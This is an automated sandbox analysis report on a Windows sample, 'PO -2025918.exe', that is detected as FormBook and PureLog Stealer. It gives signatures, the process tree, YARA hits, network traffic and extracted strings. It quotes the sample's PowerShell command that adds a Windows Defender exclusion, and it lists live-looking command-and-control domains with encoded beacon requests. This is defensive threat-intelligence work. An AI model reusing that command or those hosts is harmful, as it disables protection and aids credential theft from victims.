Windows Analysis Report
PO -2025918.exe

Overview

General Information

Sample name:PO -2025918.exe
Analysis ID:1592062
MD5:cb01d48baf8a685f7f8233565e3cbfb7
SHA1:b205be3b958db2891cd2582131ed22d89b37bc07
SHA256:7365e206478fad792a4c64390b32e1d21b16a5c080a6215eba8498c638877f06
Tags: exe, user-abuse_ch

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO -2025918.exe (PID: 6680 cmdline: "C:\Users\user\Desktop\PO -2025918.exe" MD5: CB01D48BAF8A685F7F8233565E3CBFB7)
    • powershell.exe (PID: 3704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO -2025918.exe (PID: 932 cmdline: "C:\Users\user\Desktop\PO -2025918.exe" MD5: CB01D48BAF8A685F7F8233565E3CBFB7)
      • nWrCyfejRZk.exe (PID: 3068 cmdline: "C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7160 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • nWrCyfejRZk.exe (PID: 4564 cmdline: "C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2892 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            0.2.PO -2025918.exe.7040000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.PO -2025918.exe.3777590.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.PO -2025918.exe.7040000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.PO -2025918.exe.2b71520.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    4.2.PO -2025918.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO -2025918.exe", ParentImage: C:\Users\user\Desktop\PO -2025918.exe, ParentProcessId: 6680, ParentProcessName: PO -2025918.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", ProcessId: 3704, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO -2025918.exe", ParentImage: C:\Users\user\Desktop\PO -2025918.exe, ParentProcessId: 6680, ParentProcessName: PO -2025918.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", ProcessId: 3704, ProcessName: powershell.exe
                      No Suricata rule has matched

                      AV Detection

                      Source: PO -2025918.exeVirustotal: Detection: 52%
                      Source: PO -2025918.exeReversingLabs: Detection: 57%
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: PO -2025918.exeJoe Sandbox ML: detected
                      Source: PO -2025918.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO -2025918.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose,9_2_00AAC600
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax9_2_00A99E10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then pop edi9_2_00A9E21E
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h9_2_031A04CE

                      Networking

                      Source: DNS query: www.letsbookcruise.xyz
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zucchini.proUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /54nj/?V0=jQd8/d8A1xfb/FB4a5ld7s51nRiuWU3OCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JhvpvAlNBW96dL3eN6Dv39YB+Yc5uDns7m3I=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vh5g.sbsUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /gq43/?V0=h/dnkFjaM/BlMTbdESaBO4yDKWKmOcDz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOE/Y8+3cOhgXpERP3XxTgx1mSo6tETBq5XpQ=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.actionhub.liveUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.100millionjobs.africaUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.truckgoway.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aloezhealthcare.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficDNS traffic detected: DNS query: www.zucchini.pro
                      Source: global trafficDNS traffic detected: DNS query: www.vh5g.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.v89ey584d.shop
                      Source: global trafficDNS traffic detected: DNS query: www.actionhub.live
                      Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                      Source: global trafficDNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
                      Source: global trafficDNS traffic detected: DNS query: www.hwak.live
                      Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
                      Source: global trafficDNS traffic detected: DNS query: www.truckgoway.info
                      Source: global trafficDNS traffic detected: DNS query: www.aloezhealthcare.info
                      Source: global trafficDNS traffic detected: DNS query: www.letsbookcruise.xyz
                      Source: unknownHTTP traffic detected: POST /54nj/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeCache-Control: max-age=0Host: www.vh5g.sbsOrigin: http://www.vh5g.sbsReferer: http://www.vh5g.sbs/54nj/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:30 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:33 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:35 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:38 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 17:17:17 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 17:17:20 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9
                      Source: PO -2025918.exe, 00000000.00000002.1865271514.000000000279D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: PO -2025918.exe, 00000000.00000002.1879163401.0000000005119000.00000004.00000020.00020000.00000000.sdmp, PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz/coi2/
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.0000000003E36000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003986000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.vh5g.sbs/
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fasthosts.co.uk/
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.000000000415A000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003CAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: ROUTE.EXE, 00000009.00000003.2301997952.0000000007BB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1

                      E-Banking Fraud

                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
